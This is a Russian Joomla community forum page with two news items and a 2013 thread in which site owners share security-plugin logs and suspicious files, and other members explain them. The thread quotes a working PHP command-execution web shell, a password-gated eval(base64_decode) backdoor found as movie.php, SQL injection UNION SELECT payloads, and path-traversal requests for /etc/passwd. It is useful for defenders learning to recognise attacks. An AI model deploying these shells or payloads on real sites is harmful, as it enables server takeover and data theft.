Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 271259 Просмотров
*

Rex_One

  • Захожу иногда
  • 453
  • 37 / 0
Пытаюстся ломануть (наверное боты) но пока безуспешно.
Скрин.
http://prntscr.com/1513yc

что пытаются сделать?!


p.s. Вареза на сайте нет.
Кривизна рук не компенсирует прямизну извилин.
*

verstalshik

  • Завсегдатай
  • 1754
  • 95 / 1
Пытаюстся ломануть (наверное боты) но пока безуспешно.
что пытаются сделать?!
ищут наверное на какой системе сайт? запросы даже не джумловские)))
ничо не делать, ждать своего часа))) IP на всяк случай забанить в htaccess, но они каждый день новые)))
UPD. кстати мысля возникла, есть же сервисы по определению установленной CMS, мож они тут тоже долю свою добавляют?))) кому-то просто ваш сайт понравился и хочет узнать, на чем сделан, чтобы себе тоже такой же сделать?)) бред конечно, жаараа)))
❶ НЕ СПРАВЛЯЕШЬСЯ САМ???  Поможем тут...  ❷ Калькулятор доставки - ЗАКАЖИ!!!...  ❸ Каталог компаний - ЖМИ!!!...  ❹ НОВИЧКИ! ВСЕ сюда! Первая консультация БЕСПЛАТНО!!
*

xpyct

  • Захожу иногда
  • 62
  • 0 / 0
Что хотели этим сказать?
Толи загрузить шел толи запустить, вообщем не понятно куда или откуда :(
Код
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
и вдогонку, что значит (это лог от jhackguard)
Спойлер
[свернуть]
« Последнее редактирование: 17.05.2013, 10:39:26 от xpyct »
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
боты не на шутку разбушевались, за сутки пришло 6 логов с попытками взлома, буду проверять сайты на предмет взлома.
Цитировать
* Union Select [GET:user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
** Union Select [REQUEST:user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
118.173.73.148

*HTTP_USER_AGENT :
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;

*REQUEST_METHOD :
GET

*QUERY_STRING :
view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_name='CHARACTER_SETS'%20--%20;&option=com_mytube



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[view] => videos
 -[type] => member
 -[user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
 -[option] => com_mytube


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[view] => videos
 -[type] => member
 -[user_id] => -66 union select 1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_name='CHARACTER_SETS' -- ;
 -[option] => com_mytube

Цитировать
* Local File Inclusion [GET:phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg
** Local File Inclusion [REQUEST:phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg

**PAGE / SERVER INFO


*REMOTE_ADDR :
178.124.167.9

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; U; MRA 5.10 (build 5231); ru) Presto/2.9.168 Version/11.50

*REQUEST_METHOD :
GET

*QUERY_STRING :
phocaslideshow=../../../../../../../../../../../etc/passwd%00.jpg



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[phocaslideshow] => ../../../../../../../../../../../etc/passwd .jpg

Цитировать
* Local File Inclusion [GET:phocadownload] => ../../../../../../../../../../../etc/passwd .jpg
** Local File Inclusion [REQUEST:phocadownload] => ../../../../../../../../../../../etc/passwd .jpg

**PAGE / SERVER INFO


*REMOTE_ADDR :
178.124.167.9

*HTTP_USER_AGENT :
Opera/9.80 (Windows NT 6.1; U; MRA 5.10 (build 5231); ru) Presto/2.9.168 Version/11.50

*REQUEST_METHOD :
GET

*QUERY_STRING :
phocadownload=../../../../../../../../../../../etc/passwd%00.jpg



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[phocadownload] => ../../../../../../../../../../../etc/passwd .jpg


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[phocadownload] => ../../../../../../../../../../../etc/passwd .jpg
*

rosalin

  • Захожу иногда
  • 68
  • 0 / 0
ребята как проверить работает ли Marco's SQL Injection, до этого использовал jHackGuard, тот переодически писал лог, но хочеться получать лог по почте поэтому включил Marco's SQL Injection. но писем не получаю... ((
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Что хотели этим сказать?
Толи загрузить шел толи запустить, вообщем не понятно куда или откуда :(
Код
echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}


Это мини PHP шелл использующий систеные функции сервера, вообще тоже самое что и командная строка!
*

ghio

  • Захожу иногда
  • 102
  • 0 / 0
Подскажите, что может быть: поставила jhackguard 3 мая, с того времени каждый день вот такая штука.

Спойлер
[свернуть]

Но больше всего настораживает вот этот кусок
Спойлер
[свернуть]

После этого все сайты и админки на хостинге стали выдавать ошибку 500...
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Народ подскажите, по логам,

почти ко всем сайтам на аккаунте такие логи
 
Спойлер
[свернуть]

Я правильно понимаю, что входили в админку? Меня смущает код 200)
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Установи для твоей версии плагин oseSecure. И настрой вход в админку по секретному слову.
*

denn70

  • Захожу иногда
  • 110
  • 2 / 0
Установи для твоей версии плагин oseSecure. И настрой вход в админку по секретному слову.

ДА, это уже сейчас в процессе))) Просто хотел понять действительно ли поимели доступ к админкам или нет. Логи приходитьс анализировать первый раз, поэтому не сильно шарю
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
код 200 это означает что страница доступна, но не значит что в админку попали, по ответу 200 вывод такой не делается
шпаргалка
читаем и учим
*

Valenty

  • Новичок
  • 1
  • 0 / 0
Подскажите, пожалуйста, что делать
Спойлер
[свернуть]
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Получил сегодня по одному из сайтов:
Спойлер
[свернуть]
Я так понимаю, просто проверяют наличие самого шела? (Данного файла на сервере не нашел...)
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Данного файла на сервере не нашел...

Если не нашёл - ещё не значит что его не было, файл мог удалить сам себя.
*

ELLE

  • Глобальный модератор
  • 4505
  • 893 / 0
угу, подтверждаю...они сначала заливают один, с помощью которого в любую директорию запихиваю вирусню (или производят иные действия), а этот (имею в виду не конкретно pst.php, а вообще. в моем случае это был index.php) первый потом просто самоуничтожается...

ну, а могли и просто простукивать
« Последнее редактирование: 09.06.2013, 01:35:12 от ELLE »
*

ArtTeam

  • Захожу иногда
  • 186
  • 0 / 0
jHackGuard
подскажите что єто значит
Спойлер
[свернуть]
*

an0ther

  • Осваиваюсь на форуме
  • 34
  • 9 / 1
Понравилась вот такая попытка постучаться на сайт:
Цитировать
46.61.6.174 | 14:54:19 10.06.2013 | /adguard-ajax-crossdomain-hack/images/helper_top_background
IP  в черный список, конечно, но интересно это что за скрипт такой искали?
*

Vivit

  • Новичок
  • 2
  • 0 / 0
Доброго дня!

Вот такой вопрос, захожу на сайт -  ошибка, в админку,  а там:
 
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/u129442/vivitsu/www/libraries/joomla/import.php on line 29 Strict Standards: Non-static method JLoader:

и так далее на нескольких страницах, это...  что и как с этим бороться...

написала в тех. поддержку а они...

Восстановили файлы сайта из резервной копии от 14 мая. Однако данная операция не позволила восстановить работоспособность сайта. На сколько можно понять, в файл /vivitsu/www/templates/rt_refraction_j15/index.php 21 апреля был внедрен вредоносный код.

Резервные копии хранятся только две недели и резервных копий ранее 14 мая не сохранилось. В данном случае вам необходимо восстановить работоспособность сайта самостоятельно или с привлечением сторонних компетентных специалистов.

может кто возьмется восстановить, я  проф... т.е.  полный профан 
   
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
кто подскажет что за дрянь нашел у заказчика под видом  movie.php

Цитировать
<?php
if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
eval (base64_decode($_POST["php"]));
exit;
}
?>
*

an0ther

  • Осваиваюсь на форуме
  • 34
  • 9 / 1
кто подскажет что за дрянь нашел у заказчика под видом  movie.php
Видимо процесс следующий:
скрипт выполняет проверку - если контрольная сумма MD5 параметра "gif"  POST-запроса  равна указанной цифре, то декодировать содержимое параметра "php" POST-запроса и выполнить.
Как то так.

 Это - shell
« Последнее редактирование: 14.06.2013, 23:23:17 от an0ther »
*

an0ther

  • Осваиваюсь на форуме
  • 34
  • 9 / 1
Кто скажет, что за уязвимость искали:
Спойлер
[свернуть]
?
« Последнее редактирование: 17.06.2013, 22:33:40 от an0ther »
*

Vivit

  • Новичок
  • 2
  • 0 / 0
wishlight у меня скайп - Спам... я все снесла...  напишите мне на почту через мой сайт... спасибо.
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Ребят, эта ведь "бяка"? Мне стоит ее прихлопнуть? Я с JS что то не очень, но eval меня сразу смутил... :'(

Спойлер
[свернуть]
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Мне стоит ее прихлопнуть?

Конечно стоит - нафига он такой древний, да ещё и в пакере?
*

Очередной вебмастер

  • Давно я тут
  • 768
  • 55 / 0
  • лысый умный дядя
Конечно стоит - нафига он такой древний, да ещё и в пакере?
Ну это не моя прихоть =) Шаблон старый для Joomla 1.5 от JoomlaBamboo, да и сам файл не используется в шаблоне, просто я все файлы "шерстю" после чистки сайта от вирусов...
Сайты на Joomla, разработка и поддержка
----------
Помог ответ - жми плюс!
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Ну кстати в пакер мало ли что могли напихать. Возьми уж официальный minified
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3849
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 3934
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 3139
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1179
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2761
Последний ответ 03.11.2020, 17:36:03
от Cedars